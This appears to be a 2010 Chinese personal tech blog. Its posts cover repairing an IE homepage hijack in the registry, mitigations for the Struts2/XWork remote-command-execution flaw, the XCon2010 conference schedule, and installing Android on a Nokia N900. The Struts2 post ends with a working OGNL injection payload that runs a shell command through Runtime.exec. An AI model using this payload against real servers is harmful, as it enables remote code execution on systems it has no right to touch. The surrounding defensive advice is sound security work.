August 17, 2010
August 10, 2010
桌面上的IE被XXOO了
平时基本都不用IE的,估计是用Firefox的IEtab浏览过什么,导致双机桌面上的Internet Explorer打开主页是http://www.cnweb123.cn/?hao123。看了下IE属性设置的主页还是我默认的,而且发现用快捷方式和直接用iexplore.exe程序打开都是正常的,就用桌面的那个IE图标打开异常,一生气我就直接把桌面的IE图标给删掉了。
后来查了下注册表,发现[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]默认项被改成了"C:\Program Files\Internet Explorer\iexplore.exe" http://www.cnweb123.cn/?hao123,改回默认的"C:\Program Files\Internet Explorer\iexplore.exe" 就ok了。
另外恢复删除了的桌面上IE图标可以用下面几个方法:
1、打开“我的电脑”向上回到上一层“桌面”,把其中的Internet Explorer复制到桌面恢复。
2、或者在其他地方,只要不是桌面就行,创建一个Internet Explorer.{871C5380-42A0-1069-A2EA-08002B30309D}文件夹,然后把这个文件夹复制到桌面也可。
3、还有一种方法恢复,打开自定义桌面后,因为在SP3后就没IE的选项了,但是我们可以按i键然后确定,再确定就能恢复出来。
4、另外改注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons \NewStartPanel]的{871C5380-42A0-1069-A2EA-08002B30309D}项为0也能恢复。
August 06, 2010
July 30, 2010
Struts2/XWork漏洞
这个漏洞出来有段时间了,一直忙没去看,当时出来的时候就有人测试说威力挺大,昨天看了下,确实是远程执行命令,很多tomcat都是root跑的,那用这个,等于直接就root权限远程执行命令了。
昨天有服务器有问题,都让他们排查了下。基本上没有裸跑tomcat的,限制可以在系统级做,nginx和haproxy都对含\u0023的参数提交禁掉就ok了。单独跑tomcat的可以写个过滤器,每个项目都加上:
<interceptor-ref name="params">
<param name="excludeParams">.*\\u0023.*</param>
</interceptor-ref>
比较麻烦。
官方已出补丁:
http://svn.apache.org/viewvc?view=revision&revision=956389
详情:http://vfocus.net/art/20100729/7509.html
exp:
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("touch /tmp/vittertestok")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
XCon2010会议日程
XCon2010会议日程
---------------------------------------------------------------------------------------------------------------
2010-8-4 XCon2010 第一天
---------------------------------------------------------------------------------------------------------------
时间 演讲者 议题
---------------------------------------------------------------------------------------------------------------
07:30 - 09:00 注册
---------------------------------------------------------------------------------------------------------------
09:00 - 09:10 开幕词
---------------------------------------------------------------------------------------------------------------
09:10 - 10:10 Richard Stallman 软件专利的危害
---------------------------------------------------------------------------------------------------------------
10:10 - 10:30 茶歇
---------------------------------------------------------------------------------------------------------------
10:30 - 11:30 FlashSky 基于数据流SDL的安全测试
---------------------------------------------------------------------------------------------------------------
11:30 - 12:30 刘小珍 AVM2虚拟机逃逸技术研究
---------------------------------------------------------------------------------------------------------------
12:30 - 14:30 午餐
---------------------------------------------------------------------------------------------------------------
14:30 - 15:30 陈小波 & 谢君 绕过windows 7 浏览器内存保护
---------------------------------------------------------------------------------------------------------------
15:30 - 16:00 茶歇
---------------------------------------------------------------------------------------------------------------
16:00 - 17:00 玩命 虚拟化病毒感染
---------------------------------------------------------------------------------------------------------------
17:00 - 18:00 nEINEI 对抗AV检测--病毒遗传感染技术探索
---------------------------------------------------------------------------------------------------------------
2010-8-5 XCon2010 第二天
---------------------------------------------------------------------------------------------------------------
时间 演讲者 议题
---------------------------------------------------------------------------------------------------------------
09:00 - 10:00 John Lambert 影响未来开发的9种趋势
---------------------------------------------------------------------------------------------------------------
10:00 - 10:30 茶歇
---------------------------------------------------------------------------------------------------------------
10:30 - 11:30 于淼 硬件虚拟化下的反调试手段软件保护
---------------------------------------------------------------------------------------------------------------
11:30 - 12:30 FunnyWei 深入剖析及挖掘PDF漏洞
---------------------------------------------------------------------------------------------------------------
12:30 - 14:30 午餐
---------------------------------------------------------------------------------------------------------------
14:30 - 15:30 安天实验室 病毒分析流水线
---------------------------------------------------------------------------------------------------------------
15:30 - 16:00 茶歇
---------------------------------------------------------------------------------------------------------------
16:00 - 17:00 XCon2010 论坛
---------------------------------------------------------------------------------------------------------------
17:00 - 17:20 XCon2010 幸运抽奖
---------------------------------------------------------------------------------------------------------------
17:20 - 17:30 闭幕词
July 14, 2010
Android 2.2装到的N900上
Android 2.2装到了SD卡上双系统,等MeeGo有电话模块和UI界面了后也装SD卡上,弄个多系统引导。
Android 2.2 for N900目前支持:
Dual boot with Maemo 5
Sound (built-in speakers only)
Touchscreen input
Keyboard input
WiFi networking (beta)
Internal eMMC as SD with automount
Partial battery monitoring
Microphone (alpha)
LCD && keyboard backlight (beta)
Charging (beta, only with wall-charger)
Accelerometers (alpha)
Bluetooth
还不支持:
Phone
Vibrator
Proximity && light sensors
Unlock/Lock switch on the right side
2D gfx
3D gfx
GPS
FM Radio Transmitter
FM Radio Reciever
Camera, camera button
安装:会重新分区SD卡,格式化,我的fat分了2G,其他的都分了EXT3装系统用。
umount /dev/mmcblk1p1
sfdisk -uM /dev/mmcblk1 << EOF
,2048,C
,,L
,,
,,
EOF
umount /dev/mmcblk1p1
mkdosfs /dev/mmcblk1p1
sfdisk -R /dev/mmcblk1
mke2fs -j -m0 /dev/mmcblk1p2
apt-get -y install bzip2 wget
cd /home/user/MyDocs/
wget http://downloads.nitdroid.com/Jay-c/multiboot-0.1.1.tar.gz
cd /
tar xzvf /home/user/MyDocs/multiboot-0.1.1.tar.gz
mkdir /and
mount -o noatime,rw /dev/mmcblk1p2 /and
cd /home/user/MyDocs
wget http://downloads.nitdroid.com/NITDroid-N900-0.0.5-3-BIG.tbz2
cd /and
rm -rf *
bzip2 -d /home/user/MyDocs/NITDroid-N900-0.0.5-3-BIG.tbz2
tar xvf /home/user/MyDocs/NITDroid-N900-0.0.5-3-BIG -C /and
找到自己的蓝牙MAC地址记下来,然后
cd /and/system/bin
vi load_modules.sh
找到BDADDR="0cddef0a0e6d" 把后面的地址改成你自己的。
cd /
umount /and
rmdir /and
安装完成,重启,出现多引导菜单。
进去系统发现比较慢,可能对硬件支持还不是太好吧。期待更新能支持电话和GPS模块。继续等MeeGo的系统。已经出的Day1有了UI,据说很快就出电话模块了。还有NeoPwn2啥时候能提供下载呢。






